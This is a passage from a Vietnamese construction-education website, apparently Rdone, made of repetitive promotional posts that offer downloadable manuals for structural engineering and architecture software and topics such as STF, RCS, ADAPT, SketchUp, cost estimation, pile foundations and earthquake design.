xây dựng mô hình kết cấu BTCT bằng Etabs 2017 ở đây nhé ! Xin cảm ơn các bạn đã theo dõi bài viết của mình. Hẹn gặp lại các bạn ở những bài viết tiếp theo! Các bạn có thể tham khảo thêm các bài viết khác về xây dựng tại Rdone Giáo trình học Revit MEP thiết kế cơ khí – Điện – Nước. Giáo trình tự học 3DS MAX hay nhất 2020. Giáo trình học phần mềm SolidWord [siêu hot]. Tài liệu học Revit Structure cơ bản cho người mới sử dụng. Phần mềm cắt thép SteelCutter – UNICONS (thi công xây dựng). Cảm ơn các bạn đã đồng hành cùng Rdone. Chúc các bạn thành công!
 • Thiết kế khung thép tiền chế - Tài liệu học phần mềm STF
  Tài liệu học thiết kế khung thép tiền chế Các bạn có thể tìm thấy rất nhiều tài liệu học thiết kế nhà tiền chế trên mạng với thời đại công nghệ thông tin hiện nay. Nhưng tìm được tài liệu đầy đủ, chi tiết và siêu hot nữa thì chỉ có ở Rdone thôi nhé! Bài viết dưới đây chúng tôi sẽ giới thiệu đến cho các bạn tài liệu về phần mềm này. Mời các bạn tham khảo! Nguồn: ketcausoft.com 1. Giới thiệu phần mềm STF - Thiết kế khung thép tiền chế KCS STF 2018 là phần mềm thiết kế khung thép tiền chế, giao diện đồ họa trực quan, dễ thao tác và sử dụng KCS STF 2018 bao gồm các chức năng chính như sau: Tính toán nội lực cho khung theo phương pháp phần tử hữu hạn mô hình chuyển vị (PTHH) Tính toán và kiểm tra bền, kiểm tra ổn định cho cột vát theo tiêu chuẩn việt nam Kiểm tra các liên kết Tính toán và xuất thuyết minh tính toán sang file PDF Hướng dẫn sử dụng: đi kèm với phần mềm 2. Thông tin cập nhật 09.09.2019: Sửa lỗi khi xuất hiện 2 tiết diện khác nhau tại vị trí nối dầm 24.06.2019: Kiểm tra ổn định ngoài mặt phẳng dựa vào tiết diện tương đương 10.12.2018: Sửa lỗi lưu dữ liệu liên kết 08.11.2018: Sửa lỗi xác định chiều cao khi cao độ chân cột khác 0 10.10.2018: Chức năng tổng hợp khối lượng thép 01.10.2018: Cập nhật phiên bản 2018 3. Giới thiệu tài liệu Sau đây mình giới thiệu các bạn về tài liệu học sử dụng STF. Tài liệu gồm 13 chương: Chương 1: Cơ sở lý thuyết Chương 2: Quy trình tính toán Chương 3: Các quy định chung Chương 4: Cửa sổ khởi động nhanh Chương 5: Xây dựng mô hình Chương 6: Các công cụ hiệu chỉnh' Chương 7: Khai báo các trường hợp tải trọng và tổ hợp Chương 8: Gán tải trọng Chương 9: Phân tích mô hình Chương 10: Các chức năng mô hình quan sát Chương 11: Tính toán liên kết Chương 12: Xuất kết quả tính toán Chương 13: Các phím tắt của phần mềm Các bạn có thể đến với ketcausoft.com để sử dụng phần mềm. Tôi gửi các bạn tài liệu hướng dẫn sử dụng phần mềm IFD triển khai chi tiết móng đơn đây nhé ! Xin cảm ơn các bạn đã theo dõi bài viết của mình. Hẹn gặp lại các bạn ở những bài viết tiếp theo! Các bạn có thể tham khảo thêm các bài viết khác về xây dựng tại Rdone Tài liệu học KTV-Phần mềm kiểm tra cốt thép vách. Tài liệu học WDL-Tính toán tải trọng gió chuẩn nhất. Tài liệu học PLAXIS, đầy đủ, chi tiết nhất hiện nay. Tài liệu học RCS – Phần mềm triển khai cốt thép sàn. Tài liệu học IFD – Phần mềm triển khai chi tiết móng đơn. Cảm ơn các bạn đã đồng hành cùng Rdone. Chúc các bạn thành công!
 • Triển khai cốt thép sàn - Tài liệu học phần mềm RCS
  Tài liệu học phần mềm triển khai cốt thép sàn Các bạn có thể tìm thấy rất nhiều tài liệu học phần mềm RCS trên mạng với thời đại công nghệ thông tin hiện nay. Nhưng tìm được tài liệu đầy đủ, chi tiết và siêu hot nữa thì chỉ có ở Rdone thôi nhé! Bài viết dưới đây chúng tôi sẽ giới thiệu đến cho các bạn tài liệu về phần mềm này. Mời các bạn tham khảo! Nguồn: ketcausoft.com 1. Giới thiệu phần mềm RCS - triển khai cốt thép sàn(đây là phần mềm miễn phí) RCS là phần mềm hỗ trợ triển khai và thống kê thép sàn , với các chức năng cơ bản sau: Vẽ thép sàn Hỗ trợ vẽ mặt cắt sàn Đánh số và thống kê thép sàn 2. Giao diện phần mềm 3. Giới thiệu tài liệu học RCS - Phần mềm triển khai cốt thép sàn Sau đây mình giới thiệu các bạn về tài liệu học sử dụng RCS. Tài liệu gồm 7 chương: Chương 1: Quy trình sử dụng Chương 2: Hướng dẫn vẽ một số loại thép Chương 3: Thống kê cốt thép Chương 4: Hiệu chỉnh thanh thép Chương 5: Tạo ghi chú Chương 6: Vẽ mặt cắt Chương 7: Các thiết lập Các bạn có thể đến với ketcausoft.com để sử dụng phần mềm. Tôi gửi các bạn tài liệu hướng dẫn sử dụng phần mềm RCS triển khai cốt thép sàn tại đây nhé ! Xin cảm ơn các bạn đã theo dõi bài viết của mình. Hẹn gặp lại các bạn ở những bài viết tiếp theo! Các bạn có thể tham khảo thêm các bài viết khác về xây dựng tại Rdone Tài liệu học KTV-Phần mềm kiểm tra cốt thép vách. Tài liệu học STF - Phần mềm thiết kế khung thép tiền chế. Tài liệu học IFD – Phần mềm triển khai chi tiết móng đơn. Tài liệu học WDL-Tính toán tải trọng gió chuẩn nhất. Tài liệu học ADAPT – Phần mềm thiết kế dầm, sàn ứng suất trước. Cảm ơn các bạn đã đồng hành cùng Rdone. Chúc các bạn thành công!
 • Tài liệu học ADAPT - Phần mềm thiết kế dầm, sàn ứng suất trước
  Tài liệu học ADAPT Các bạn có thể tìm thấy rất nhiều tài liệu học ADAPT trên mạng với thời đại công nghệ thông tin hiện nay. Nhưng tìm được tài liệu đầy đủ, chi tiết và siêu hot nữa thì chỉ có ở Rdone thôi nhé! Bài viết dưới đây chúng tôi sẽ giới thiệu đến cho các bạn tài liệu về phần mềm này. Mời các bạn tham khảo! 1. Giới thiệu phần mềm ADAPT Với khả năng của mình để mô hình đầy đủ các tòa nhà cao tầng, ADAPT 2015 cung cấp giá trị vượt trội so với các chương trình thiết kếsàn đơn tầng khác. Là một chương trình độc lập, nó phân tích và thiết kế nhiều tầng riêng biệt cùng một lúc. Kết hợp với module Edge, nó phân tích các mô hình xây dựng hoàn chỉnh và kết hợp tải trọng đứng và ngang bên trong một thiết kế của hệ thống sàn hiệu quả và chính xác. Các ứng dụng của ADAPT - Builder: Sàn phẳng (Thương mại, khu dân cư, khách sạn, y tế) Sàn và dầm 1 phương (Kết cấu nhà xe) Sàn sườn 2 phương (waffle slabs) Sàn chuyển (stransfer slabs) Điều tra và sửa chữa sàn bê tông hiện hữu Phương pháp phân tích độ rung của hệ thống sàn bê tông 2. Giới thiệu tài liệu học ADAPT Sau đây mình giới thiệu các bạn về tài liệu học sử dụng ADAPT. Tài liệu có 113 trang gồm 2 Phần: Phần 1: Các công cụ trong phần mềm ADAPT - Builder Chương 1: Giới thiệu phần mềm Chương 2: Các công cụ mô hình hóa, thiết kế trong ADAPT - Builder Chương 3: Các thanh menu của chương trình ADAPT - Builder Chương 4: Các công cụ mô hình phần tử kết cấu Chương 5: Các công cụ tạo dãy sàn theo dãy (DESIGN STRIPS) Chương 6: Các công cụ tạo cáp căng Chương 7: Các công cụ xem mô hình kết cấu - biểu đổ Chương 8: Các ký hiệu, tiêu điểm và đặc trưng ADAPT - Builder Chương 9: Các phần tử trong phần mềm ADAPT - Builder Chương 10: Các bước giải quyết và phân tích trong phần mềm ADAPT - Builder Phần 2: Bài tập ví dụ áp dụng trong phần mềm ADAPT - Builder Bài 1: Chuyển Mô hình từ Autocad sang ADAPT - Builder phần tích, tính toán, thiết kế cho mặt bằng sàn Bài 2: Phương pháp vẽ cáp căng cho dầm, sàn trên mặt bằng Copy cáp trên mặt bằng Bài 3: Chuyển dữ liệu sàn từ ETABS vào ADAPT - Builder Bài 4: Tính toán độ giãn dài của cáp căng trên mặt bằng Thay đổi thông số theo nhóm Xuất bản vẽ thiết kế cáp sang bản vẽ Autocad  Tôi gửi các bạn tài liệu hướng dẫn sử dụng phần mềm ADAPT phần mềm tính toán thiết kế các loại sàn - dầm ứng suất trước tại đây nhé ! Xin cảm ơn các bạn đã theo dõi bài viết của mình. Hẹn gặp lại các bạn ở những bài viết tiếp theo! Các bạn có thể tham khảo thêm các bài viết khác về xây dựng tại Rdone Tài liệu học RCS – Phần mềm triển khai cốt thép sàn. Tài liệu học STF - Phần mềm thiết kế khung thép tiền chế. Tài liệu học IFD – Phần mềm triển khai chi tiết móng đơn. Tài liệu học KTV-Phần mềm kiểm tra cốt thép Vách. Tài liệu học WDL-Tính toán tải trọng gió chuẩn nhất. Cảm ơn các bạn đã đồng hành cùng Rdone. Chúc các bạn thành công!
 • Tài liệu dự toán xây dựng thực hành [siêu hot]
  Tài liệu học dự toán xây dựng   Các bạn có thể tìm thấy rất nhiều tài liệu dự toán học dự toán xây dựng trên mạng với thời đại công nghệ thông tin hiện nay. Nhưng tìm được tài liệu đầy đủ, chi tiết và siêu hot nữa thì chỉ có ở Rdone thôi nhé! Bài viết dưới đây chúng tôi sẽ giới thiệu đến cho các bạn tài liệu giúp các bạn thực hành dự toán tốt nhất. Mời các bạn tham khảo! Dự toán trong xây dựng Khái niệm: Dự toán là dự kiến tính toán giá trị Công trình trước khi thi công xây dựng. Được lập căn cứ trên cơ sở khối lượng các công việc xác định theo thiết kế kỹ thuật hoặc thiết kế bản vẽ thi công. Mục đích của việc lập Dự toán? Giúp chủ đầu tư dự kiến số tiền phải chi trả để có được Công trình hoặc hạng mục công trình mong muốn Xác định một căn cứ để xét chọn nhà thầu, thương thảo ký kết Hợp đồng, phê duyệt dự án đầu tư, sử dụng làm căn cứ để thẩm tra, thẩm định, thanh quyết toán… Tại sao cần có kỹ năng lập dự toán? Hầu hết các kỹ sư cần xây dựng cần phải có kỹ năng này. Đây là kỹ năng bổ trợ tối cần thiết gì tham gia các hoạt động tư vấn, thi công xây dựng. Không phải ngẫu nhiên mà môn học này được tổ chức nhiều nhất và nhiều nơi dạy nhất. 80% các mẫu tin tuyển dụng yêu cầu có kỹ năng này. Vai trò của việc lập Dự toán? Là tài liệu quan trọng gắn liền với thiết kế cho biết chi phí xây dựng công trình. Là cơ sở để lập kế hoạch đầu tư, thuyết phục ngân hàng đầu tư cấp phát vốn vay và để chủ đầu tư và nhà thầu lập kế hoạch cho chính mình. Là căn cứ để đàm phán, ký kết hợp đồng, thanh quyết toán khi chỉ định thầu; Là căn cứ xác định giá gói thầu, giá thành xây dựng khi đấu thầu và là cơ sở để tính toán các chỉ tiêu kinh tế kỹ thuật trong việc so sánh lựa chọn. Nguyên tắc xác định Dự toán? Tính đúng, tính đủ không trùng lặp chi phí, các nội dung chi phí phù hợp và tuân thủ theo các quy định của Nhà nước. Lập theo mặt bằng giá tại thời điểm lập dự toán. Giới thiệu tài liệu học dự toán xây dựng Tài liệu được viết bởi ks. Trần Chiến Thắng và kinh nghiệm 20 năm làm dự toán - giảng dạy - viết phần mềm. Tài liệu có 103 trang và gồm 7 chương và 1 phụ lục Chương 1: Khái niệm dự toán Chương 2: Tính khối lượng Chương 3: Đơn gia thực tế Chương 4: Cách quản lý của nhà nước trong dự toán Chương 5: Đơn giá nhà nước Chương 6: Sử dụng máy tính Chương 7: Dự toán dự thầu và tiến độ Excel Phục lục 1: Một số lưu ý khi sử dụng đơn giá, định mức Tôi gửi các bạn tài liệu dự toán xây dựng thực hành tại đây nhé ! Xin cảm ơn các bạn đã theo dõi bài viết của mình. Hẹn gặp lại các bạn ở những bài viết tiếp theo! Các bạn có thể tham khảo thêm các bài viết khác về xây dựng tại Rdone Chi phí xây nhà 3 tầng 30m2 và tư vấn thiết kế công năng Sách hướng dẫn thực hành thiết kế lắp đặt điện trong nhà. Phần mềm dự toán miễn phí tốt nhất hiện nay. Tài liệu tự học phần mềm Dự toán G8 có Video. Giáo trình hướng dẫn đo bóc khối lượng lập dự toán xây dựng. Dự toán công trình xây dựng – Tài liệu lập dự toán chi tiết. Dự toán chi phí xây nhà cấp 4 50m2 hết bao nhiêu tiền? Cảm ơn các bạn đã đồng hành cùng Rdone. Chúc các bạn thành công!
 • Tính toán động đất với kết cấu BTCT theo TCVN 375-2006
  Sau đây là mục lục của sổ tay tính toán động đất với BTCT chịu động đất theo TCVN 375-2006: MỤC LỤC 1. KHÁI NIỆM CƠ BẢN ..........................................................................................................................3 1.1. Những nguyên tắc chỉ đạo trong tính toán thiết kế cơ sở ................................................................... 3 1.2. Gia tốc nền thiết kế theo lý thuyết............................................................................................................. 4 1.3. Cấp động đất theo định nghĩa....................................................................................................................... 7 1.4. Các cách  phân loại đất nền................................................................................................................... 9 1.5. Biểu diễn cơ bản của tác động động đất nên công trình........................................................................... 11 2. TÍNH TOÁN VÀ TỔ HỢP CÁC LOẠI TẢI TRỌNG ĐỘNG ĐẤT..........................................................................11 2.1. Các phương pháp mô phỏng tải trọng động đất của phương pháp................................................................ 11 2.1.1. Phương pháp tính toán tĩnh lực ngang tương đương  .......................................................................11 2.1.2. Phổ thiết kế dùng cho tính toán và phân tích đàn hồi ...........................................................................12 2.2. Tổ hợp các thành phần động đất trong tài liệu  (mục 4.3.3.5.) ................................................................ 18 2.2.1. Tổ hợp các phản ứng dạng dao động của động đất................................................................................18 2.2.2. Các thành phần nằm ngang của tải trọng động đất theo lý thuyết (mục 4.3.3.5.1) ..................................18 2.2.3. Các thành phần nằm đứng của tải trọng động đất theo lý thuyết(mục 4.3.3.5.2)....................................19 2.3. Tổ hợp các loại tải trọng, nội lực và chuyển vị của động đất................................................................................ 20 2.3.1. Xác định nội lực theo lý thuyết .................................................................................................................20 2.3.2. Tổ hợp tải trọng, nội lực và chuyển vị của động đất................................................................................20 3. MÔ PHỎNG TẢI TRỌNG ĐỘNG ĐẤT TRONG PHẦN MỀM  ETABS ...................................................................24 3.1. Phương pháp lực ngang tương đương  tĩnh.............................................................................. 24 3.2. Phương pháp phổ phản ứng trong phần mềm ............................................................................................. 26 3.2.1. Tải gia tốc của dộng đất..........................................................................................................................26 3.2.2. Hệ trục tọa độ địa phương của tải gia tốc theo thiết kế..........................................................................26 3.2.3. Đường cong phổ phản ứng được tính toán ...............................................................................................26 3.2.4. Trình tự khai báo các thành phần ...............................................................................................................27 3.3. Phương pháp phân tích động lực học kết cấu theo thời gian lịch sử................................. 32 3.3.1. Cơ sở lý thuyết của phương pháp..................................................................................................................32 3.3.2. Trình tự phân tích động đất..............................................................................................................33 3.3.3. Phương pháp tích phân dạng dao động (modal integration)..............................................34 3.3.4. Trình tự khai báo các loại tải ...............................................................................................................35 3.4. Phân tích kết quả từ các phương pháp mô phỏng động đất.............................................. 38 3.4.1. Kết quả phân tích phổ phản ứng .......................................................................................38 3.4.2. Kết quả phân tích lịch sử - thời gian  của tác động..................................................................................38 3.5. Ví dụ tính toán cơ bản ................................................................................................................... 39 3.6. Kết luận chung của phương pháp................................................................................................................... 41 4. CẤU TẠO KHÁNG CHẤN.................................................................................................................42 4.1. Cấp dẻo kết cấu và các thành phần  ................................................................................................................ 42 4.2. Cấu tạo kháng chấn của các cấu kiện theo cấp dẻo .......................................................... 43 4.2.1. Các tham số cấu tạo đối với dầm chịu tải......................................................................................46 4.2.2. Các tham số cấu tạo đối với cột chịu tải........................................................................................49 4.2.3. Các tham số cấu tạo đối với cột và nút dầm ......................................................................52 4.2.4. Các tham số cấu tạo đối với tường cứng chiu đông đất...........................................................................56 4.3. Cấu tạo kháng chấn của các cấu kiện theo cấp chống động đất ....................................... 61 4.3.1. Bảng phân loại các cấp chống động đất............................................................................61 4.3.2. Quy định bố trí cấu tạo đối với dầm...................................................................................63 4.3.3. Quy định bố trí cấu tạo đối với cột.....................................................................................66 4.3.4. Quy định bố trí cấu tạo đối với tường cứng (vách cứng)....................................................69 4.3.5. Quy định bố trí cấu tạo đối với lanh tô (gác qua lỗ cửa vách cứng)...................................75 4.3.6. Quy định bố trí cấu tạo đối với giằng móng và bản móng Để có thể xem toàn bộ chi tiết sổ tay thiết kế nhà đẹp phần kết cấu các bạn có thể tải ở link sau: Link download: tải về Ngoài ra các bạn có thể tham khảo thêm các tài liệu khác rất bổ ích của Rdone. Các bài có thể liên quan: Bộ tài liệu về tính toán kết cấu bể chứa. Bài giảng giám sát thi công và nghiệm thu công tác bê tông cốt thép. Tài liệu giám sát thi công lắp đặt thiết bị công nghệ. Tài liệu tư vấn quản lý dự án và giám sát công trình [ Mới nhất]. Tài liệu lập hồ sơ quản lý chất lượng công trình -Tập toàn Novaland, Cảm ơn các bạn đã đồng hành cùng Rdone. Chúc các bạn thành công trên mọi lĩnh vực!
 • Móng cọc phân tích và thiết kế - Gs,ts. Vũ Công Ngữ
  Tài liệu về móng cọc phân tích và thiết kế Các bạn có thể tìm thấy rất nhiều tài liệu về móng cọc trên mạng với thời đại công nghệ thông tin hiện nay. Nhưng tìm được tài liệu đầy đủ, chi tiết và siêu hot nữa thì chỉ có ở Rdone thôi nhé! Bài viết dưới đây chúng tôi sẽ giới thiệu đến bạn đọc cuốn sách móng cọc phân tích và thiết kế. Mời các bạn tham khảo! Tìm hiểu về móng cọc Móng cọc là gì? Móng&nbsp;cọc là loại móng hình trụ dài &nbsp;và sử dụng các vật liệu như bê tông,&nbsp;cọc cừ tràm&nbsp;được đẩy xuống đất để hoạt động như một sự hỗ trợ ổn định cho các cấu trúc được xây dựng trên nó. Móng cọc gồm hai thành phần: đài&nbsp;cọc và một hoặc một nhóm cọc. Các nền móng được sử dụng chủ yếu để chuyển tải trọng từ cấu trúc siêu, thông qua các tầng lớp chịu nén yếu hoặc nước trên nền đất hoặc đá cứng hơn, nhỏ gọn hơn, ít nén và cứng hơn. Loại móng này được sử dụng cho các kết cấu lớn và những nền đất yếu, có độ lún nhiều và thường xuyên bị sạt&nbsp;lở. Vật liệu cấu tạo móng cọc và phân loại Cọc gỗCọc thép Cọc bê tông Cọc composite Móng cọc đài thấp: Là móng cọc có đài cọc nằm dưới mặt đất, loại móng cọc này sẽ được đặt sao cho lực ngang của móng cân bằng với áp lực của đất theo độ sâu đặt móng tối thiểu nhất. Các cọc trong móng hoàn toàn chịu lực nén Móng cọc đài cao: Là móng cọc có đài cọc nằm cao hơn mặt đất, tức là chiều sâu của móng nhỏ hơn chiều cao của cọc. Móng cọc đài cao chịu cả hai tải trọng uốn nén, lúc này toàn bộ tải trọng đứng và ngang đều do các cọc trong móng chịu. Đề hiểu rõ hơn các bạn hãy sử dụng cuốn sách phân tích thiết kế móng cọc Giới thiệu về sách móng cọc phân tích và thiết kế Tài liệu tôi gửi đến các có 254 trang gồm 6 chương và 4 phụ lục, mời các bạn tham khảo: Chương 1: Tổng quan về móng cọcChương 2: Cọc chế sẵnChương 3: Cọc nhồiChương 4: Tính toán cọc làm việc đồng thời với nềnChương 5: Một số phương pháp thí nghiệm cọcChương 6: Lựa chọn giải pháp móng cọcPhụ lục 1: Tính nén lún và sức chống cắt của đấtPhụ lục 2: Một số yếu tố ảnh hưởng đến sức chịu tải của cọcPhụ lục 3: Một số phương trình xấp xỉPhụ lục 4: File số liệu các ví dụ GRL-WEAP Tôi gửi các bạn cuôn sách phân tích và thiết kế móng cọc&nbsp;tại đây nhé ! Xin cảm ơn các bạn đã theo dõi bài viết của mình. Hẹn gặp lại các bạn ở những bài viết tiếp theo! Các bạn có thể tham khảo thêm các bài viết khác về xây dựng tại Rdone Thiết kế móng đơn – Tài liệu học phần mềm IFD [Mới nhất].Phân tích thiết kế móng cọc với phần mềm rMC siêu hot.Đồ án nền móng – full tài liệu, điểm 10/10 [Siêu hot].Khung vây cọc ván thép – tính bằng excel tiện lợi.Bảng excel tính toán móng đơn – Tài liệu thiết kế [Cực Hay]. Cảm ơn các bạn đã đồng hành cùng Rdone. Chúc các bạn thành công!
 • Tài liệu tính toán thiết kế mái đón kính bằng Sap2000
  Các bạn có thể tìm thấy rất nhiều tài liệu thiết kế bằng Sap2000. Nhưng tìm được tài liệu đầy đủ, chi tiết và siêu hot nữa thì chỉ có ở Rdone thôi nhé! Bài viết dưới đây chúng tôi sẽ giới thiệu đến bạn bộ tải liệu tính toán thiết kế mái đón kính bằng Sap2000 và AutoCAD. Mời các bạn tham khảo! Tìm hiểu thêm về mái đón kính 1.&nbsp;Mái kính là gì? Là loại mái dùng&nbsp;Kính cường lực&nbsp;để lợp nên hệ thống kết cấu khung thép, inox, thép hình…mục đích làm sao cho đảm bảo công năng sử dụng: Che nắng, che mưa, giải pháp thẩm mỹ. 2.&nbsp;Mái sảnh kính&nbsp;cường lực, mái hiên kính&nbsp;cường lực là gì? Chúng ta thường thấy ở các tòa nhà, bệnh viện, văn phòng hay biệt thự lẫn nhà dân khu vực ra vào tòa nhà hay trụ sở đó khách thường đứng ở đó để đón xe, chờ khách…nếu không có mái che kính rất bất hợp lý Mái kính ở những vị trí như thế của công trình được gọi là&nbsp;Mái sảnh kính&nbsp;cường lực&nbsp;hay mái hiên kính cường lực. Bant chất&nbsp;Mái sảnh kính&nbsp;cường lực hay mái hiên kính cũng là loại mái dùng kính cường lực để đặt nên hệ thống kết cấu thép 3.&nbsp;Giếng trời bằng kính cường lực là gì? Với su thế phát triển hiện nay, quỹ đất ngày càng thu hẹp kiểu nhà “ống” – mặt tiền nhỏ có chiều dài từ 10m đến 15m, xung quanh lại các nhà khác do đó để lưu thông không khí và lấy sang các kiến trúc sư, kỹ sư đã phát minh ra kiểu gọi là giếng trời kính mục đích để lấy ánh sang, thông gió cho ngôi nhà. Giếng trời bằng kính cường lực là một dạng của mái kính cường lực nhưng nằm ở trí đặc biệt của ngôi nhà(nóc nhà) dùng kính cường lực đặt trực tiếp nên tường hay kết cấu khung thép Nội dung tài liệu tính toán thiết kế mái đón kính Tài liệu gồm 1 file pdf và 1 file AutoCAD và 1 file Sap2000 v14.2.2: File Sap2000 tính toán mái đón kính File AutoCAD thiết kế mái đón kính File thuyết minh pdf mái đón kính Download tài liệu tính toán kết thế mái đón kính bằng Sap2000 Để xem chi tiết tài liệu tính toán thiết kế mái đón kính các bạn truy cập tại đây nhé ! Xin cảm ơn các bạn đã theo dõi bài viết của mình. Hẹn gặp lại các bạn ở những bài viết tiếp theo! Các bạn có thể tham khảo thêm các bài viết khác về xây dựng tại Rdone Tài liệu tự học SAP2000 từ cơ bản đến nâng cao.Thiết kế khung thép tiền chế - Tài liệu học phần mềm STF.Thiết kế móng đơn - Tài liệu học phần mềm IFD [Mới nhất].Phân tích thiết kế móng cọc với phần mềm rMC siêu hot,Tính toán vách cứng - Tài liệu học KTV [Siêu hot]. Cảm ơn các bạn đã đồng hành cùng Rdone. Chúc các bạn thành công!
 • Giáo trình học SketchUp - Giáo trình chuẩn cho người dùng
  Để tiếp tục với các chuyên đề liên quan đến giáo trình về xây dựng. Hôm nay Rdone lại chia sẻ đến cho các bạn cuốn giáo trình học SketchUp - giáo trình học phần mềm thiết kế nhà cho mọi người tham khảo và dùng làm tài liệu học tập. Mời các bạn tham khảo bài viết dưới đây để hiểu rõ hơn về phần mềm này nhé! Phần mềm SketchUp SketchUp là phần mềm đồ họa 3D dễ học, tốn ít thời gian. Chuyên ứng dụng vào thiết kế sơ phác, xây dựng mô hình trong các lĩnh vực kiến trúc, nội thất, cảnh quan xây dựng,...SketchUp trực quan hóa mọi hoạt động tương tự như khi vẽ tay. Mọi tính năng được xây dựng vừa đủ dùng nhưng khả năng thể hiện ý tưởng sơ phác khá hiệu quả.Phần mềm này không những giúp người dùng vẽ nhanh mà còn rất chính xác nữa. Nó có khả năng thăm dò điểm nội suy, giả lập bóng đổ theo thời gian, tạo mặt cắt tương tác, áp vật liệu dễ dàng,... Giáo trình học SketchUp Giáo trình gồm 8 chương:Chương 1: Giới thiệu giao diện cho người dùngChương 2: Các công cụ làm việc trong SketchUpChương 3: Bài thực hành cho các công cụ đã họcChương 4: Thực hành dựng biệt thư, nhà phốChương 5: Công cụ Sandbox tools Chương 6: Các công cụ dựng hình nâng caoChương 7: Vray cho sketchUpChương 8: Ôn tập kiến thức đã học Sau đây là một số hình ảnh của giáo trình &nbsp; Trên đây là một số ý giới thiệu về phần mềm cũng như về giáo trình. Và cuối cùng là link download full giáo trình học SketchUp Tại đây Ngoài ra các bạn có thể xem nhiều tài liệu xây dựng hay khác tại RdoneCác tài liệu liên quan:Giáo trình tự học 3DS MAX hay nhất 2020Giáo trình học Revit MEP thiết kế cơ khí - Điện - NướcTài liệu học MATLAB toàn tập - Phần mềm xây dựng ma trậnTài liệu tự học Midas Civil - Phần mềm mô hình cầu vòmGiáo trình học SolidWorks hot nhất hiện nay Cảm ơn các bạn đã theo dõi bài viết của chúng tôi. Chúc các bạn thành công!
 • Tài liệu học SketchUp cho người mới bắt đầu sử dụng
  Hôm nay Rdone chúng tôi lại chia sẻ cho các bạn tài liệu học SketchUp từ cơ bản đến nâng cao cho người mới bắt đầu sử dụng phần mềm. Tài liệu cung cấp đủ các kĩ năng cũng như cách sử dụng phần mềm. Để các bạn dùng làm tài liệu học tập và sử dụng tốt hơn phần mềm nhé! Tài liệu học SketchUp Đây là tài liệu cung cấp cho bạn các kiến thức từ A-Z cách sử dụng phần mềm. Cung cấp cho người dùng từ những thứ cơ bản nhất cho người chưa biết hay mới bắt đầu tìm hiểu về SketchUp. Nó là phần mềm đồ họa 3D do hãng Last Solfware phát triển. Chuyên ứng dụng vào thiết kế sơ phác, xây dựng mô hình trong lĩnh vực kiến trúc, nội thất, cảnh quan, xây dựng, thiết kế cảnh quan trong điện ảnh, thiết kế sân khấu,... Tài liệu chia ra làm 2 phần riêng biệt: Phần A: Vẽ cơ bản: Phần này giới thiệu đến cho các bạn giao diện - làm quen với SketchUp và các lệnh vẽ trong SketchUp. Phần B: Vẽ nâng cao: Phần này giới thiệu chi tiết đến cho các bạn cách vẽ có hệ thống, vật liệu - ánh sáng- bóng đổ, tạo địa hình với sandbox, dựng mô hình từ hình ảnh, vẽ vơi plugin,... Sau đây là một số hình ảnh của tài liệu Trên đây chúng tôi đã giới thiệu sơ qua cho các bạn biết thêm về tài liệu cũng như phần mềm về kiến trúc. Để tìm hiểu kĩ hơn về phần mềm thì các bạn download full tài liệu học SketchUp Tại đây Ngoài ra bạn cũng có thể xem thêm các tài liệu hay khác tại RdoneCác bài viết liên quan: Giáo trình học SketchUp - Giáo trình chuẩn cho người dùng Giáo trình học Revit MEP thiết kế cơ khí - Điện - Nước Giáo trình tự học 3DS MAX hay nhất 2020 Thiết kế khung thép tiền chế - Tài liệu học phần mềm STF Triển khai cốt thép sàn - Tài liệu học phần mềm RCS Cảm ơn các bạn đã theo dõi bài viết của chúng tôi. Đây là động lực để chúng tôi có những bài viết những tài liệu hay hơn gửi đến cho các bạn. Chúc các bạn thành công!
 • Ứng dụng google SketchUp trong thiết kế kiến trúc [Mới nhất]
  Để tiếp tục với các tài liệu về kiến trúc. Hôm nay Rdone lại chia sẻ đến cho các bạn tài liệu ứng dụng google SketchUp trong thiết kế kiến trúc. Đây là tài liệu hay đầy đủ mà chúng tôi sưu tầm được để gửi đến cho các bạn, nhằm giúp các bạn thành thạo hơn trong việc sử dụng phần mềm. Để có thể hiểu chi tiết hơn và tải bộ tài liệu này thì các bạn tham khảo bài viết ở dưới đây nhé! Ứng dụng SketchUp Tài liệu này tập trung vào việc sử dụng SketchUp trong model dựng hình công trình nhà cửa và nội thất. Tài liệu hướng dẫn các bạn vẽ được những ngôi nhà, khung cảnh của nhà theo ý mình và làm cách nào để cho tác phẩm của mình được độc đáo nhất. Ngoài ra, còn dạy bạn cách xuất hình qua Originalqua kênh style + phần mềm chỉnh sửa ảnh. Một tác phẩm đẹp ngoài model chính xác ra còn phải biết chọn góc camera và xuất Original nữa nhé. Một số phần mềm hỗ trợ làm SketchUp Original: PhotoshopFotosketcherPainterPiranesiGIMSketchbook Sau đây là một số hình ảnh có trong tài liệu mà SketchUp làm được Trên đây chúng tôi đã giới thiệu một số ứng dụng cũng như sản phẩm của SketchUp Các bạn có thể tải Full tài liệu ứng dụng SketchUp Tại đây Ngoài ra các bạn cũng có thể xem thêm các tài liệu về xây dựng hay khác tại RdoneCác tài liệu liên quan:Tài liệu học SketchUp cho người mới bắt đầu sử dụngGiáo trình học SketchUp - Giáo trình chuẩn cho người dùngGiáo trình học Revit MEP thiết kế cơ khí - Điện - NướcGiáo trình tự học 3DS MAX hay nhất 2020Tài liệu học Tekla Structures, đầy đủ và mới nhất 2020Cảm ơn các bạn đã theo dõi bài viết của chúng tôi. Chúc các bạn thành công!
 • Tài liệu tính toán thiết kế lõi thang máy chuẩn nhất
  Trong quá trình thiết kế thi công nhà, Các bạn có thể tìm thấy rất nhiều tài liệu về thang máy trên mạng hiện nay. Nhưng Rdone luôn mang đến cho bạn những tài liệu đầy đủ và trong tính toán và thiết kế. Bài viết dưới đây chúng tôi sẽ giới thiệu đến bạn tài liệu tính toán thiết kế lõi thang máy chuẩn nhất. Mời các bạn tham khảo! Giới thiệu tài liệu tính toán thiết kế lõi thang máy chuẩn nhất Lõi, vách bê tông cốt thép là một trong những kết cấu chịu lực quan trọng trong khung của nhà nhiều tầng. Nó kết hợp với hệ khung hoặc hệ giàn hoặc kết hợp với nhau tạo nên hệ kết cấu chịu lực cho công trình. Tuy nhiên việc tính toán chưa đề cập cụ thể trong tiêu chuẩn Việt Nam. Trên thế giới một số tiêu chuẩn đã đưa ra phương pháp thiết kế lõi vách Tài liệu tập trung vào thiết kế lõi thang máy bằng các phương pháp tính sau: Phương pháp phân bố ứng suất đàn hồi Phương pháp giả thiết vùng biên chịu momen Phương pháp xây dựng biểu đồ tương tác &nbsp; Download tài liệu Để tải tài liệu thiết kế lõi thang máy các bạn truy cập tại đây nhé ! Xin cảm ơn các bạn đã đón xem bài viết của mình. Hẹn gặp lại các bạn ở những bài viết tiếp theo với những tài liệu hay khác 